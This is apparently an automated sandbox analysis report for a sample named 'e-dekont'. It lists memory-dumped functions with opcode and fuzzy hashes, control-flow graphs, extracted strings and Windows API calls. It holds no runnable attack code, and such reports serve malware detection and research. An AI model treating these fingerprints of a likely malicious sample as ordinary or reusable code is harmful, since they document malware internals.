                                                        • Opcode Fuzzy Hash: 33089aad69faadcea4950514c90d1b58f979e79f0c870124b1f55ad99cb2f14c
                                                        • Instruction Fuzzy Hash: A84168B4A052089BDB14CF99D484ADDFBB2FF88300F24D168E5086B381CB31A986DF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C015F8 Relevance: .7, Instructions: 745COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d3a49e2b56aab27d6bbed474c023ad76c99cdfa458b785a2b43beeee35fcd347
                                                        • Instruction ID: b52e489da9555a41b5b0b3ca54eaa5e891ec6cd04ec28bd9f76060cc99ff8111
                                                        • Opcode Fuzzy Hash: d3a49e2b56aab27d6bbed474c023ad76c99cdfa458b785a2b43beeee35fcd347
                                                        • Instruction Fuzzy Hash: 11826C74E012288FDB64DF69C998BDDBBB2BB89300F1481EA940DA7365DB355E85CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C08A58 Relevance: .3, Instructions: 296COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 63e5b7fbd35411cc3a799d5dad6ec9bde457cc1d37363d944271f7ef5d2194e2
                                                        • Instruction ID: 0d8a61f7eec98b769fa6bac3dfb7cccce033257f7dbf9220ae7b3201bf274999
                                                        • Opcode Fuzzy Hash: 63e5b7fbd35411cc3a799d5dad6ec9bde457cc1d37363d944271f7ef5d2194e2
                                                        • Instruction Fuzzy Hash: C3E1B174E01218CFEB64DFA5C954B9DBBB2BF89304F2081AAD409AB394DB355E85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C074A0 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 77158af645d33f579d03f32ad9e6f64b623abfdb2d150c50d3585dfde74bf9cb
                                                        • Instruction ID: 2f65c168d9b2d7b8b993b2aaf6fe5ba9fda002eb74efd71c16c26aef7662dce1
                                                        • Opcode Fuzzy Hash: 77158af645d33f579d03f32ad9e6f64b623abfdb2d150c50d3585dfde74bf9cb
                                                        • Instruction Fuzzy Hash: EAC18F74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB364DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0DAC0 Relevance: .2, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 859e8bf4f2c19a17ae716f221417f2ae634609f27ff5e32650579052c86273b0
                                                        • Instruction ID: 43d66e007737f52972cc295858fe24ce7fa14d7366b7d445be15087b934a7350
                                                        • Opcode Fuzzy Hash: 859e8bf4f2c19a17ae716f221417f2ae634609f27ff5e32650579052c86273b0
                                                        • Instruction Fuzzy Hash: 8BA1A174E012288FEB68CF6AD944B9DFBF2AF89300F14C0AAD40DA7255DB745A85CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0CE28 Relevance: .2, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe0e027bfeeabf76acfdd4eadfcfb804438317ec26e0807316983e678771a799
                                                        • Instruction ID: 8ed61757ff9b60bc49e5690f86f3a8ca06884a454296aa4ef51e3ff48f0645ae
                                                        • Opcode Fuzzy Hash: fe0e027bfeeabf76acfdd4eadfcfb804438317ec26e0807316983e678771a799
                                                        • Instruction Fuzzy Hash: D0A1A174E012188FEB68CF6AD944B9DFBF2AF89300F14C1AAD40DA7255DB345A85CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0C7D8 Relevance: .2, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 66f284a71c2306bda3b870f78ca1d6603009d2c75159589ce06be3e3a79d99b6
                                                        • Instruction ID: 4d8dd31dd99e4b19a666f09195d1dfc0c532e996c281f200de84b780b3b1b65d
                                                        • Opcode Fuzzy Hash: 66f284a71c2306bda3b870f78ca1d6603009d2c75159589ce06be3e3a79d99b6
                                                        • Instruction Fuzzy Hash: D5A1A2B4E012188FEB68CF6AD944B9DBBF2AF89300F14D1AAD40DA7254DB345A85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0BB38 Relevance: .2, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6567b791d1346610a63d58f7753474bd17927282aa019c933e0457a83c4bd4cd
                                                        • Instruction ID: 986c2a1d9699ca8101c1061f557e3853253478cfd327e69cadc0a5084d8e9f59
                                                        • Opcode Fuzzy Hash: 6567b791d1346610a63d58f7753474bd17927282aa019c933e0457a83c4bd4cd
                                                        • Instruction Fuzzy Hash: 78A1AF74E012288FEB68CF6AD944B9DFBF2AF89300F14C0AAD50DA7254DB345A85CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0A858 Relevance: .2, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a00d1b11075a911360821fceb4c09170da8a629aab1a9a3fbfbc5eab75dcca69
                                                        • Instruction ID: 3676109b1e3d68d85f507d6eb254bb81590c5a977866270c76865231c7da9dae
                                                        • Opcode Fuzzy Hash: a00d1b11075a911360821fceb4c09170da8a629aab1a9a3fbfbc5eab75dcca69
                                                        • Instruction Fuzzy Hash: 9CA1A274E012288FEB68CF6AC944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0C188 Relevance: .2, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a3a763ad01b2fff67603ad69fe493b12f10b15dc4473dfc9cdc70b2c8fcd8b04
                                                        • Instruction ID: 6752fde33adbaa90c24174e39d60746d8d05ed689c83987b3be12307e460fc58
                                                        • Opcode Fuzzy Hash: a3a763ad01b2fff67603ad69fe493b12f10b15dc4473dfc9cdc70b2c8fcd8b04
                                                        • Instruction Fuzzy Hash: A4A19274E012188FEB68CF6AD944B9DFBF2BF89300F14C1AAD409A7255DB345A85CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0AEA8 Relevance: .2, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 76c9658a661ea1b74a28730959c5c5fbe671933089b9c8cf64b854b28302f5a4
                                                        • Instruction ID: dbb9ab001aa2904d2871910f602aee646d50a45e815ee0089926a04b63d63227
                                                        • Opcode Fuzzy Hash: 76c9658a661ea1b74a28730959c5c5fbe671933089b9c8cf64b854b28302f5a4
                                                        • Instruction Fuzzy Hash: BFA192B4E012188FEB68CF6AC944B9DFBF2AF89300F14C0AAD508A7255DB355A85CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0B4F0 Relevance: .2, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6bc799beff7aedfdafb834b30cff2a527c1b1e88970239387c11b30858a9d10
                                                        • Instruction ID: 52552b6a480775892ed649f27112f40cd6e75613679b6cb1ea972d0f47e55a14
                                                        • Opcode Fuzzy Hash: f6bc799beff7aedfdafb834b30cff2a527c1b1e88970239387c11b30858a9d10
                                                        • Instruction Fuzzy Hash: 12A19174E012188FEB68CF6AC944B9DFBF2AF89300F14C1AAD40DA7255DB355A85CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0D478 Relevance: .2, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b4e04bda4c145d59cef46d23579ae3b4600d304cc9b1763745efedfde273ceb5
                                                        • Instruction ID: 97e0e5d271859af1001d9179a5776f58a665ac5fe907eed757d123d73135d0b3
                                                        • Opcode Fuzzy Hash: b4e04bda4c145d59cef46d23579ae3b4600d304cc9b1763745efedfde273ceb5
                                                        • Instruction Fuzzy Hash: 34A19074E012288FEB68CF6AD944B9DFBF2AF89300F14D4AAD40DA7254DB345A85CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0B4E0 Relevance: .2, Instructions: 170COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 057ca7153d7b38728d943bf61454c64d695674500453b36fb4dadf5b3b915e6b
                                                        • Instruction ID: 0fc40af44f8b35c050c3a803bb8796b21e3baed2e7776811c7c2799658218394
                                                        • Opcode Fuzzy Hash: 057ca7153d7b38728d943bf61454c64d695674500453b36fb4dadf5b3b915e6b
                                                        • Instruction Fuzzy Hash: 647195B1E016188FEB68CF6AC944B9DFBF2AF89300F14C1AAD50DA7254DB305A85CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0D468 Relevance: .2, Instructions: 166COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 905fd8b2833b5b809bdd26e5bbd85e195b3af1839d37ca1097be4f5c06377a51
                                                        • Instruction ID: 1ef9ed0a8955fe6da4796cd86f6551e792f61f24c628f38610ead1a6189c1381
                                                        • Opcode Fuzzy Hash: 905fd8b2833b5b809bdd26e5bbd85e195b3af1839d37ca1097be4f5c06377a51
                                                        • Instruction Fuzzy Hash: A3819570E016198FEB68CF6AC944B9DFBF2AF89300F14C5AAD40DA7254DB345A85CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0AE98 Relevance: .2, Instructions: 165COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d55b08c4113b63012ce9d5971d4eaa732f4601332ea5ed252032c5afdbfa3817
                                                        • Instruction ID: 4e9a209ec6fd4f1928181f178f638cb490d2561aebf2b5b8f1aae13a6ba42ec3
                                                        • Opcode Fuzzy Hash: d55b08c4113b63012ce9d5971d4eaa732f4601332ea5ed252032c5afdbfa3817
                                                        • Instruction Fuzzy Hash: 3C7183B1E016188FEB68CF6AC944B9DBBF2AF89300F14C1AAD50DA7254DB344A85CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C08A48 Relevance: .1, Instructions: 119COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aad63d247962b05de8d517c8635c7282223e248bc8608b131431ba951c0ab29a
                                                        • Instruction ID: cd81b8b0f9dde7a912842967165ec988fcffdf4adcd0e82646c07946722d0a83
                                                        • Opcode Fuzzy Hash: aad63d247962b05de8d517c8635c7282223e248bc8608b131431ba951c0ab29a
                                                        • Instruction Fuzzy Hash: FB41B3B0D012188BEB58DFAAC8447DEFBF2BF88304F24D069D458AB294DB755946CF64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0A848 Relevance: .1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7ed317d95197c9a062b4c0b84af543c6779c0364e7a76576b3112a2a01846ff9
                                                        • Instruction ID: deefb82b6c6d93022d027d7826953ede7298a8a5478815dbd7ab9cc85163aba5
                                                        • Opcode Fuzzy Hash: 7ed317d95197c9a062b4c0b84af543c6779c0364e7a76576b3112a2a01846ff9
                                                        • Instruction Fuzzy Hash: B7417AB1E016188BEB58CF6BC9457C9FBF3AFC9304F04C1AAC50CA6264DB340A858F51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0C7C9 Relevance: .1, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3c5dbc1cff9ef99f420a01bb1b49165d12044dca07ef863fc723cc84df807749
                                                        • Instruction ID: 8877d098644319272e10376d4ea3910042e84b3eb9a5603536eedfee6fe59179
                                                        • Opcode Fuzzy Hash: 3c5dbc1cff9ef99f420a01bb1b49165d12044dca07ef863fc723cc84df807749
                                                        • Instruction Fuzzy Hash: 16416B71E016188BEB58CF6BD9457DAFBF3AFC9300F14C1AAC50CA6254DB740A868F51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0DAAF Relevance: .1, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c9722d4131bf1ab2ca25cfde64e98f5c406799d88e07dad4889051f2ceeabd0b
                                                        • Instruction ID: 3cfb86193fe2601969756faac7b449bf27ac7b9ff420aea28edb6e7c78931d68
                                                        • Opcode Fuzzy Hash: c9722d4131bf1ab2ca25cfde64e98f5c406799d88e07dad4889051f2ceeabd0b
                                                        • Instruction Fuzzy Hash: 8B4169B1E016188BEB58CF6BC9457CAFAF3AFC9300F14C1BAD50CA6264DB740A858F51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0CE18 Relevance: .1, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ca8ba3045e85bba19c46a14c6464b7ea3d06b10d1867545db55e41708e43f112
                                                        • Instruction ID: 4384de1aa1313df8b9f6928c1b5e01aa09dfce6ac72eb1eb657454a088960fd0
                                                        • Opcode Fuzzy Hash: ca8ba3045e85bba19c46a14c6464b7ea3d06b10d1867545db55e41708e43f112
                                                        • Instruction Fuzzy Hash: 7D4179B1E016188BEB58CF6BD9457C9FAF3AFC9300F14C1AAC54CA6265DB740A868F51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0BB27 Relevance: .1, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1addc3408327594b26022235c56ba47ee2dd1820f6da613b0b3c3d36a5833740
                                                        • Instruction ID: bc75a128c1f1a7141c952dd6b23e05598b6f1fd39b4a57dc9d56c78caa9ee789
                                                        • Opcode Fuzzy Hash: 1addc3408327594b26022235c56ba47ee2dd1820f6da613b0b3c3d36a5833740
                                                        • Instruction Fuzzy Hash: E6415871E016188BEB58CF6BD9457D9FAF3AFC9300F14C1AAD50CA6264DB740A868F51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0C178 Relevance: .1, Instructions: 108COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 553ae18cf292d57986fae8833d8a8061bfefb9422148a0ebdb66e39ffa75202f
                                                        • Instruction ID: 949e30c939193ad3ea63b5ca01e1a42f80da268e269d836ca42637c8d223ceb3
                                                        • Opcode Fuzzy Hash: 553ae18cf292d57986fae8833d8a8061bfefb9422148a0ebdb66e39ffa75202f
                                                        • Instruction Fuzzy Hash: 20416AB1E016188FEB58CF6BD9557D9FAF3AFC9304F04C1AAC50CA6264DB740A868F51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C07490 Relevance: .1, Instructions: 103COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a6dce299eae0adccc19d03095abc50050c11b99f277e9f09d510a8da7a107477
                                                        • Instruction ID: 022dea84471f40a5c083e69bd5a94657748796967b2c6722fd7add8a69f199b0
                                                        • Opcode Fuzzy Hash: a6dce299eae0adccc19d03095abc50050c11b99f277e9f09d510a8da7a107477
                                                        • Instruction Fuzzy Hash: 1041D1B0E01248CBEB58DFAAD58469EFBF2AF88300F24C12AD418BB255EB345945CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DC6EB8 Relevance: 10.5, Strings: 8, Instructions: 475COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 526 2dc6eb8-2dc6eed 527 2dc731c-2dc7320 526->527 528 2dc6ef3-2dc6f16 526->528 529 2dc7339-2dc7347 527->529 530 2dc7322-2dc7336 527->530 537 2dc6f1c-2dc6f29 528->537 538 2dc6fc4-2dc6fc8 528->538 535 2dc73b8-2dc73cd 529->535 536 2dc7349-2dc735e 529->536 546 2dc73cf-2dc73d2 535->546 547 2dc73d4-2dc73e1 535->547 548 2dc7365-2dc7372 536->548 549 2dc7360-2dc7363 536->549 552 2dc6f38 537->552 553 2dc6f2b-2dc6f36 537->553 539 2dc6fca-2dc6fd8 538->539 540 2dc7010-2dc7019 538->540 539->540 560 2dc6fda-2dc6ff5 539->560 543 2dc742f 540->543 544 2dc701f-2dc7029 540->544 561 2dc7434-2dc7464 543->561 544->527 550 2dc702f-2dc7038 544->550 554 2dc73e3-2dc741e 546->554 547->554 555 2dc7374-2dc73b5 548->555 549->555 558 2dc703a-2dc703f 550->558 559 2dc7047-2dc7053 550->559 562 2dc6f3a-2dc6f3c 552->562 553->562 602 2dc7425-2dc742c 554->602 558->559 559->561 566 2dc7059-2dc705f 559->566 586 2dc6ff7-2dc7001 560->586 587 2dc7003 560->587 579 2dc747d-2dc7484 561->579 580 2dc7466-2dc747c 561->580 562->538 563 2dc6f42-2dc6fa4 562->563 614 2dc6faa-2dc6fc1 563->614 615 2dc6fa6 563->615 569 2dc7065-2dc7075 566->569 570 2dc7306-2dc730a 566->570 584 2dc7089-2dc708b 569->584 585 2dc7077-2dc7087 569->585 570->543 573 2dc7310-2dc7316 570->573 573->527 573->550 588 2dc708e-2dc7094 584->588 585->588 589 2dc7005-2dc7007 586->589 587->589 588->570 596 2dc709a-2dc70a9 588->596 589->540 597 2dc7009 589->597 598 2dc70af 596->598 599 2dc7157-2dc7182 call 2dc6d00 * 2 596->599 597->540 600 2dc70b2-2dc70c3 598->600 616 2dc726c-2dc7286 599->616 617 2dc7188-2dc718c 599->617 600->561 605 2dc70c9-2dc70db 600->605 605->561 607 2dc70e1-2dc70f9 605->607 670 2dc70fb call 2dc7498 607->670 671 2dc70fb call 2dc7488 607->671 610 2dc7101-2dc7111 610->570 613 2dc7117-2dc711a 610->613 618 2dc711c-2dc7122 613->618 619 2dc7124-2dc7127 613->619 614->538 615->614 616->527 639 2dc728c-2dc7290 616->639 617->570 621 2dc7192-2dc7196 617->621 618->619 622 2dc712d-2dc7130 618->622 619->543 619->622 624 2dc71be-2dc71c4 621->624 625 2dc7198-2dc71a5 621->625 626 2dc7138-2dc713b 622->626 627 2dc7132-2dc7136 622->627 628 2dc71ff-2dc7205 624->628 629 2dc71c6-2dc71ca 624->629 642 2dc71b4 625->642 643 2dc71a7-2dc71b2 625->643 626->543 630 2dc7141-2dc7145 626->630 627->626 627->630 632 2dc7207-2dc720b 628->632 633 2dc7211-2dc7217 628->633 629->628 631 2dc71cc-2dc71d5 629->631 630->543 636 2dc714b-2dc7151 630->636 637 2dc71e4-2dc71fa 631->637 638 2dc71d7-2dc71dc 631->638 632->602 632->633 640 2dc7219-2dc721d 633->640 641 2dc7223-2dc7225 633->641 636->599 636->600 637->570 638->637 644 2dc72cc-2dc72d0 639->644 645 2dc7292-2dc729c call 2dc5ba8 639->645 640->570 640->641 646 2dc725a-2dc725c 641->646 647 2dc7227-2dc7230 641->647 648 2dc71b6-2dc71b8 642->648 643->648 644->602 651 2dc72d6-2dc72da 644->651 645->644 659 2dc729e-2dc72b3 645->659 646->570 649 2dc7262-2dc7269 646->649 654 2dc723f-2dc7255 647->654 655 2dc7232-2dc7237 647->655 648->570 648->624 651->602 656 2dc72e0-2dc72ed 651->656 654->570 655->654 661 2dc72fc 656->661 662 2dc72ef-2dc72fa 656->662 659->644 667 2dc72b5-2dc72ca 659->667 664 2dc72fe-2dc7300 661->664 662->664 664->570 664->602 667->527 667->644 670->610 671->610
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                        • API String ID: 0-1932283790
                                                        • Opcode ID: 338dfe942fb15933dd60b1881636e47794d86d54eb3f2663f41c6a067feb3b65
                                                        • Instruction ID: 9eb82ae387585287ded1ba89c0fe179e43cd01925b5fc13bb601e0d8e26a72c2
                                                        • Opcode Fuzzy Hash: 338dfe942fb15933dd60b1881636e47794d86d54eb3f2663f41c6a067feb3b65
                                                        • Instruction Fuzzy Hash: FF123830A0020A8FDB15CF69D984A9EFBF6BF88314F248599E8599B365D730EC41CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C24B59 Relevance: 6.1, APIs: 4, Instructions: 136threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1142 6c24b59-6c24b66 1143 6c24b68-6c24b6c 1142->1143 1144 6c24b6d-6c24bf7 GetCurrentProcess 1142->1144 1143->1144 1148 6c24c00-6c24c34 GetCurrentThread 1144->1148 1149 6c24bf9-6c24bff 1144->1149 1150 6c24c36-6c24c3c 1148->1150 1151 6c24c3d-6c24c71 GetCurrentProcess 1148->1151 1149->1148 1150->1151 1153 6c24c73-6c24c79 1151->1153 1154 6c24c7a-6c24c92 1151->1154 1153->1154 1165 6c24c95 call 6c24d48 1154->1165 1166 6c24c95 call 6c24d38 1154->1166 1157 6c24c9b-6c24cca GetCurrentThreadId 1158 6c24cd3-6c24d35 1157->1158 1159 6c24ccc-6c24cd2 1157->1159 1159->1158 1165->1157 1166->1157
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 06C24BE6
                                                        • GetCurrentThread.KERNEL32 ref: 06C24C23
                                                        • GetCurrentProcess.KERNEL32 ref: 06C24C60
                                                        • GetCurrentThreadId.KERNEL32 ref: 06C24CB9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
